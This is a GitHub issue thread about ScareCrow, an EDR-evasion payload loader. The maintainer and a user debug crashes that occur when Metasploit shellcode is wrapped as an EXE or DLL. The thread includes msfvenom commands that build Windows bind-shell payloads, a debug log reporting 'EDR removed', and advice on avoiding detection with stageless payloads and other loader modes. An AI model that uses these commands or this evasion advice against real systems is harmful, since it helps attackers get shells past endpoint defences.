Comments (10)
Tylous
commented on July 22, 2024
1
I tested with the following and they worked fine in both binary and DLL format.
windows/x64/meterpreter_bind_tcp
windows/x64/meterpreter_reverse_tcp
As for your debug output, the memory address look blank which tells me something else went wrong. Since you mentioned that the control loader type worked for you (which is just a fancy DLL ) I suspect something else is going, at any rate, if the control loader worked I take it I can close this issue?
from scarecrow.
Tylous
commented on July 22, 2024
Can you provide me the exact version of Windows you tested on?
from scarecrow.
0xShkk
commented on July 22, 2024
Sure,
it was on
OS Name: Microsoft Windows 10 Enterprise 1909
OS Version: 10.0.18363.1379
from scarecrow.
Tylous
commented on July 22, 2024
I will spin up an instance tonight for testing, to see if I can recreate this issue. But I am curious what if you tried without the -b '\x00' do you still get the same issue?
from scarecrow.
Tylous
commented on July 22, 2024
So based on my testing it looks like it's the fact you are using a staged bind shellcode. Since a staged shellcode performs the task of downloading and executing the actual shellcode from the listener. The problem here is that the binaries generated from ScareCrow use a different technique from the DLLs in which the stack pointer for the string of shellcode overwrites with attributes of an actual executable function thus when that function is executed the shellcode is executed. Because of the nature of staged payloads, this crashes the process.
I confirmed this works fine with the other modes such as -Loader control where you can create an executable control panel applet. (As this method uses a different technique to execute shellcode) You can also use a stageless version of your shellcode and that will work just fine as well.
Based on my experience I recommend avoiding staged payloads as the communication to download the second stage (stage1) shellcode often is IOCed and detected.
I hope this helps?
from scarecrow.
0xShkk
commented on July 22, 2024
Thank you for helping me out.
The loader type control works just well!
Unfortunately, I can't get binary or dll to work, even with a non staged shellcode.
from scarecrow.
0xShkk
commented on July 22, 2024
Oh and regarding your first question, yes without the badchar definition \x00 its the same result
from scarecrow.
0xShkk
commented on July 22, 2024
This is the debug output for a non staged msf shellcode payload, if it helps:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x1 0xc03544f54b 0xc00013c013
PC=0xc00013c013
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
runtime: unknown pc 0xc00013c013
stack: frame={sp:0xc000130000, fp:0x0} stack=[0xc00012e000,0xc000136000)
000000c00012ff00: 0000000000000000 0000000000000000
000000c00012ff10: 0000000000000000 0000000000000000
000000c00012ff20: 0000000000000000 0000000000000000
000000c00012ff30: 0000000000000000 0000000000000000
000000c00012ff40: 0000000000000000 0000000000000000
000000c00012ff50: 0000000000000000 0000000000000000
000000c00012ff60: 0000000000000000 0000000000000000
000000c00012ff70: 0000000000000000 0000000000000000
000000c00012ff80: 0000000000000000 0000000000000000
000000c00012ff90: 0000000000000000 0000000000000000
000000c00012ffa0: 0000000000000000 0000000000000000
000000c00012ffb0: 0000000000000000 0000000000000000
000000c00012ffc0: 0000000000000000 0000000000000000
000000c00012ffd0: 0000000000000000 0000000000000000
000000c00012ffe0: 0000000000000000 0000000000000000
000000c00012fff0: 0000000000000000 0000000000000000
000000c000130000: <0000000000000000 0000000000000000
000000c000130010: 0000000000000000 0000000000000000
000000c000130020: 0000000000000000 0000000000000000
000000c000130030: 0000000000000000 0000000000000000
000000c000130040: 0000000000000000 0000000000000000
000000c000130050: 0000000000000000 0000000000000000
000000c000130060: 0000000000000000 0000000000000000
000000c000130070: 0000000000000000 0000000000000000
000000c000130080: 0000000000000000 0000000000000000
000000c000130090: 0000000000000000 0000000000000000
000000c0001300a0: 0000000000000000 0000000000000000
000000c0001300b0: 0000000000000000 0000000000000000
000000c0001300c0: 0000000000000000 0000000000000000
000000c0001300d0: 0000000000000000 0000000000000000
000000c0001300e0: 0000000000000000 0000000000000000
000000c0001300f0: 0000000000000000 0000000000000000
rax 0x3522f400
rbx 0x0
rcx 0xc000122c60
rdi 0xd2bc0d7000
rsi 0x1ed4e1
rbp 0xc000135f78
rsp 0xc000130000
r8 0xc000135d98
r9 0xc000135e28
r10 0x0
r11 0x212
r12 0xffffffffffffffff
r13 0x28
r14 0x27
r15 0xaa
rip 0xc00013c013
rflags 0x10206
cs 0x33
fs 0x53
gs 0x2b
from scarecrow.
0xShkk
commented on July 22, 2024
I do not know if it really makes a difference but I tried to create shellcode like so:
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -f raw -o bind2.raw -b '\x00'
msfvenom -p windows/x64/shell_bind_tcp EXITFUNC=none LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true LPORT=8888 -f raw -o bind2.raw
msfvenom -p windows/x64/shell_bind_tcp PrependMigrate=true EXITFUNC=thread LPORT=8888 -f raw -o bind2.raw
none of them above executed successfully via binary or dll loader method
from scarecrow.
0xShkk
commented on July 22, 2024
The DLL loader worked for me now too.
I had to rename the dll so rundll32 executed the correct one (as you mention in the tool output).
Thank you so much for this great tool and the help!
from scarecrow.
Related Issues (20)
- Windows 10 bug HOT 3
- Windows defender new sandbox HOT 3
- Newest version v4.1 not working with msfvenom payload HOT 7
- Binary loader build HOT 5
- New Feature Request - ProxyAware
- '.exp' files are not the compiled Go files HOT 3
- panic: Call to VirtualProtect failed!!!!! HOT 4
- Delivery HTA with Loaders Control or Wscript not working HOT 12
- cmd.Run() failed with exit status 0xffffffff HOT 5
- Output to the user is incorrect when using the -O <file> option HOT 1
- runtime.cgocall() Issue HOT 2
- Is this project still working? experiencing issues loading several shellcodes HOT 11
- Output Types HOT 2
- Windows executables not in PATH HOT 8
- ProcessInjection crashes HOT 5
- Doc, docx, rtf HOT 1
- cmd.Run() failed with exit status 0xc0000135 HOT 4
- Still having issues with cmd.Run() failed with exit status 255 HOT 1
- Add Go Lib Requirement
- Errors running ScareCrow. Exit status 128 and exit status 255 HOT 2
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from scarecrow.